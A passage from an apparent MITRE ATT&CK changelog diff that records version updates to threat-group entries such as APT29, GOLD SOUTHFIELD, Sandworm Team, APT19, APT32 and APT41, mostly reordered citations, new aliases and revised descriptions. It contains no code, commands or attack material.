external_references[22]['description']: Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021. → Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.
external_references[22]['url']: https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/ → https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf
external_references[23]['source_name']: Microsoft Unidentified Dec 2018 → FireEye SUNBURST Backdoor December 2020
external_references[23]['description']: Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019. → FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.
external_references[23]['url']: https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ → https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
external_references[24]['source_name']: MSTIC NOBELIUM May 2021 → SentinelOne NobleBaron June 2021
external_references[24]['description']: Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021. → Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.
external_references[24]['url']: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ → https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/
external_references[25]['source_name']: MSRC Nobelium June 2021 → Microsoft Unidentified Dec 2018
external_references[25]['description']: MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021. → Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.
external_references[25]['url']: https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/ → https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
external_references[26]['source_name']: MSTIC Nobelium Toolset May 2021 → MSTIC NOBELIUM May 2021
external_references[26]['description']: MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021. → Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.
external_references[26]['url']: https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/ → https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
external_references[27]['source_name']: MSTIC NOBELIUM Mar 2021 → MSRC Nobelium June 2021
external_references[27]['description']: Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021. → MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.
external_references[27]['url']: https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ → https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/
external_references[28]['source_name']: NCSC APT29 July 2020 → MSTIC Nobelium Toolset May 2021
external_references[28]['description']: National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020. → MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
external_references[28]['url']: https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf → https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/
external_references[29]['source_name']: Cybersecurity Advisory SVR TTP May 2021 → MSTIC NOBELIUM Mar 2021
external_references[29]['description']: NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021. → Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
external_references[29]['url']: https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf → https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
external_references[30]['source_name']: NSA Joint Advisory SVR SolarWinds April 2021 → NCSC APT29 July 2020
external_references[30]['description']: NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021. → National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.
external_references[30]['url']: https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF → https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf
external_references[31]['source_name']: Secureworks IRON HEMLOCK Profile → Cybersecurity Advisory SVR TTP May 2021
external_references[31]['description']: Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022. → NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.
external_references[31]['url']: http://www.secureworks.com/research/threat-profiles/iron-hemlock → https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf
external_references[32]['source_name']: Secureworks IRON RITUAL Profile → NSA Joint Advisory SVR SolarWinds April 2021
external_references[32]['description']: Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022. → NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.
external_references[32]['url']: https://www.secureworks.com/research/threat-profiles/iron-ritual → https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF
external_references[33]['source_name']: UK Gov Malign RIS Activity April 2021 → PWC WellMess C2 August 2020
external_references[33]['description']: UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021. → PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020.
external_references[33]['url']: https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services → https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html
external_references[34]['source_name']: UK Gov UK Exposes Russia SolarWinds April 2021 → PWC WellMess July 2020
external_references[34]['description']: UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021. → PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.
external_references[34]['url']: https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise → https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html
external_references[35]['source_name']: UK NSCS Russia SolarWinds April 2021 → Secureworks IRON HEMLOCK Profile
external_references[35]['description']: UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021. → Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022.
external_references[35]['url']: https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise → http://www.secureworks.com/research/threat-profiles/iron-hemlock
external_references[36]['source_name']: White House Imposing Costs RU Gov April 2021 → Secureworks IRON RITUAL Profile
external_references[36]['description']: White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021. → Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.
external_references[36]['url']: https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/ → https://www.secureworks.com/research/threat-profiles/iron-ritual
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 3.1 → 4.0
iterable_item_added
STIX Field: New Value
aliases: SolarStorm
aliases: Blue Kitsune
external_references: {'source_name': 'UK Gov Malign RIS Activity April 2021', 'description': 'UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.', 'url': 'https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services'}
external_references{'source_name': 'UK Gov UK Exposes Russia SolarWinds April 2021', 'description': 'UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.', 'url': 'https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise'}
external_references{'source_name': 'UK NSCS Russia SolarWinds April 2021', 'description': 'UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.', 'url': 'https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise'}
external_references{'source_name': 'Unit 42 SolarStorm December 2020', 'description': 'Unit 42. (2020, December 23). SolarStorm Supply Chain Attack Timeline. Retrieved March 24, 2023.', 'url': 'https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/'}
external_references{'source_name': 'White House Imposing Costs RU Gov April 2021', 'description': 'White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.', 'url': 'https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/'}
x_mitre_contributorsJoe Gumke, U.S. Bank

[G0115] GOLD SOUTHFIELD

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description

[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2019 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)

New Description

[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)
Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
dictionary_item_removed
STIX Field: Old value
external_references: https://www.secureworks.com/research/revil-sodinokibi-ransomware
values_changed
STIX Field: Old value → New Value
modified: 2021-04-26 12:52:34.528000+00:00 → 2023-03-28 20:49:53.223000+00:00
description: [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2019 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD) → [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)
external_references[1]['source_name']: Secureworks REvil September 2019 → Pinchy Spider
external_references[1]['description']: Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020. → (Citation: CrowdStrike Evolution of Pinchy Spider July 2021)
external_references[2]['source_name']: Secureworks GandCrab and REvil September 2019 → Secureworks REvil September 2019
external_references[2]['description']: Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020. → Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.
external_references[2]['url']: https://www.secureworks.com/blog/revil-the-gandcrab-connection → https://www.secureworks.com/research/revil-sodinokibi-ransomware
external_references[3]['source_name']: Secureworks GOLD SOUTHFIELD → CrowdStrike Evolution of Pinchy Spider July 2021
external_references[3]['description']: Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020. → Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.
external_references[3]['url']: https://www.secureworks.com/research/threat-profiles/gold-southfield → https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/
x_mitre_version: 1.1 → 2.0
iterable_item_added
STIX Field: New Value
aliases: Pinchy Spider
external_references: {'source_name': 'Secureworks GandCrab and REvil September 2019', 'description': 'Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.', 'url': 'https://www.secureworks.com/blog/revil-the-gandcrab-connection'}
external_references: {'source_name': 'Secureworks GOLD SOUTHFIELD', 'description': 'Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.', 'url': 'https://www.secureworks.com/research/threat-profiles/gold-southfield'}

[G0034] Sandworm Team

Current version: 3.0

Version changed from: 2.2 → 3.0

Details
dictionary_item_removed
STIX Field: Old value
external_references: https://www.justice.gov/opa/page/file/1098481/download
values_changed
STIX Field: Old value → New Value
modified: 2022-10-12 20:11:40.313000+00:00 → 2023-03-08 22:12:31.238000+00:00
external_references[5]['source_name']: BlackEnergy (Group) → IRIDIUM
external_references[5]['description']: (Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020) → (Citation: Microsoft Prestige ransomware October 2022)
external_references[6]['source_name']: Telebots → BlackEnergy (Group)
external_references[6]['description']: (Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) → (Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[7]['source_name']: IRON VIKING → Telebots
external_references[7]['description']: (Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) → (Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[8]['source_name']: US District Court Indictment GRU Oct 2018 → IRON VIKING
external_references[8]['description']: Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020. → (Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[9]['source_name']: Dragos ELECTRUM → US District Court Indictment GRU Oct 2018
external_references[9]['description']: Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020. → Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[9]['url']: https://www.dragos.com/resource/electrum/ → https://www.justice.gov/opa/page/file/1098481/download
external_references[10]['source_name']: F-Secure BlackEnergy 2014 → Dragos ELECTRUM
external_references[10]['description']: F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016. → Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.
external_references[10]['url']: https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf → https://www.dragos.com/resource/electrum/
external_references[11]['source_name']: iSIGHT Sandworm 2014 → F-Secure BlackEnergy 2014
external_references[11]['description']: Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017. → F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
external_references[11]['url']: https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html → https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
external_references[12]['source_name']: CrowdStrike VOODOO BEAR → iSIGHT Sandworm 2014
external_references[12]['description']: Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018. → Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.
external_references[12]['url']: https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/ → https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html
external_references[13]['source_name']: InfoSecurity Sandworm Oct 2014 → CrowdStrike VOODOO BEAR
external_references[13]['description']: Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017. → Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.
external_references[13]['url']: https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/ → https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/
external_references[14]['source_name']: NCSC Sandworm Feb 2020 → Microsoft Prestige ransomware October 2022
external_references[14]['description']: NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020. → MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.
external_references[14]['url']: https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory → https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/
external_references[15]['source_name']: USDOJ Sandworm Feb 2020 → InfoSecurity Sandworm Oct 2014
external_references[15]['description']: Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020. → Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.
external_references[15]['url']: https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html → https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/
external_references[16]['source_name']: US District Court Indictment GRU Unit 74455 October 2020 → NCSC Sandworm Feb 2020
external_references[16]['description']: Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020. → NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.
external_references[16]['url']: https://www.justice.gov/opa/press-release/file/1328521/download → https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory
external_references[17]['source_name']: Secureworks IRON VIKING → USDOJ Sandworm Feb 2020
external_references[17]['description']: Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020. → Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.
external_references[17]['url']: https://www.secureworks.com/research/threat-profiles/iron-viking → https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html
external_references[18]['source_name']: UK NCSC Olympic Attacks October 2020 → US District Court Indictment GRU Unit 74455 October 2020
external_references[18]['description']: UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020. → Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
external_references[18]['url']: https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games → https://www.justice.gov/opa/press-release/file/1328521/download
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.2 → 3.0
iterable_item_added
STIX Field: New Value
aliases: IRIDIUM
external_references: {'source_name': 'Secureworks IRON VIKING ', 'description': 'Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-viking'}
external_references: {'source_name': 'UK NCSC Olympic Attacks October 2020', 'description': 'UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.', 'url': 'https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games'}
Minor Version Changes

[G0073] APT19

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2021-05-26 12:38:01.003000+00:00 → 2023-03-21 20:44:02.443000+00:00
external_references[1]['source_name']: APT19 → Sunshop Group
external_references[1]['description']: (Citation: FireEye APT19) → (Citation: Dark Reading Codoso Feb 2015)
external_references[2]['source_name']: Codoso → Codoso Team
external_references[2]['description']: (Citation: Unit 42 C0d0so0 Jan 2016) → (Citation: FireEye APT Groups)
external_references[3]['source_name']: C0d0so0 → APT19
external_references[3]['description']: (Citation: Unit 42 C0d0so0 Jan 2016) → (Citation: FireEye APT19)
external_references[4]['source_name']: Codoso Team → Codoso
external_references[4]['description']: (Citation: FireEye APT Groups) → (Citation: Unit 42 C0d0so0 Jan 2016)
external_references[5]['source_name']: Sunshop Group → C0d0so0
external_references[5]['description']: (Citation: Dark Reading Codoso Feb 2015) → (Citation: Unit 42 C0d0so0 Jan 2016)
external_references[7]['source_name']: ICIT China's Espionage Jul 2016 → Dark Reading Codoso Feb 2015
external_references[7]['description']: Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018. → Chickowski, E. (2015, February 10). Chinese Hacking Group Codoso Team Uses Forbes.com As Watering Hole. Retrieved September 13, 2018.
external_references[7]['url']: https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/ → https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059
external_references[10]['source_name']: Dark Reading Codoso Feb 2015 → ICIT China's Espionage Jul 2016
external_references[10]['description']: Chickowski, E. (2015, February 10). Chinese Hacking Group Codoso Team Uses Forbes.com As Watering Hole. Retrieved September 13, 2018. → Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.
external_references[10]['url']: https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059 → https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/
x_mitre_version: 1.4 → 1.5

[G0050] APT32

Current version: 2.6

Version changed from: 2.5 → 2.6

Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2021-10-14 16:39:50.790000+00:00 → 2023-03-21 21:04:18.158000+00:00
external_references[1]['source_name']: APT32 → SeaLotus
external_references[1]['description']: (Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021) → (Citation: Cybereason Oceanlotus May 2017)
external_references[2]['source_name']: SeaLotus → APT-C-00
external_references[2]['description']: (Citation: Cybereason Oceanlotus May 2017) → (Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)
external_references[3]['source_name']: OceanLotus → APT32
external_references[4]['source_name']: APT-C-00 → OceanLotus
external_references[4]['description']: (Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021) → (Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)
external_references[5]['source_name']: FireEye APT32 May 2017 → Amnesty Intl. Ocean Lotus February 2021
external_references[5]['description']: Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017. → Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. Retrieved March 1, 2021.
external_references[5]['url']: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html → https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf
external_references[6]['source_name']: Volexity OceanLotus Nov 2017 → FireEye APT32 May 2017
external_references[6]['description']: Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017. → Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.
external_references[6]['url']: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/ → https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
external_references[7]['source_name']: ESET OceanLotus → Cybereason Oceanlotus May 2017
external_references[7]['description']: Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018. → Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.
external_references[7]['url']: https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/ → https://www.cybereason.com/blog/operation-cobalt-kitty-apt
external_references[8]['source_name']: Cybereason Oceanlotus May 2017 → ESET OceanLotus Mar 2019
external_references[8]['description']: Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018. → Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.
external_references[8]['url']: https://www.cybereason.com/blog/operation-cobalt-kitty-apt → https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/
external_references[9]['source_name']: ESET OceanLotus Mar 2019 → ESET OceanLotus
external_references[9]['description']: Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019. → Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.
external_references[9]['url']: https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/ → https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/
external_references[10]['source_name']: Amnesty Intl. Ocean Lotus February 2021 → Volexity OceanLotus Nov 2017
external_references[10]['description']: Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. Retrieved March 1, 2021. → Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.
external_references[10]['url']: https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf → https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
x_mitre_version: 2.5 → 2.6

[G0096] APT41

Current version: 3.1

Version changed from: 3.0 → 3.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-06-02 20:09:29.475000+00:00 → 2023-03-23 15:45:58.846000+00:00
external_references[4]['url']: https://content.fireeye.com/apt-41/rpt-apt41 → https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf
external_references[5]['url']: https://content.fireeye.com/apt-41/rpt-apt41 → https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf
external_references[6]['url']: https://blog.group-ib.com/colunmtk_apt41 → https://www.group-ib.com/blog/colunmtk-apt41/
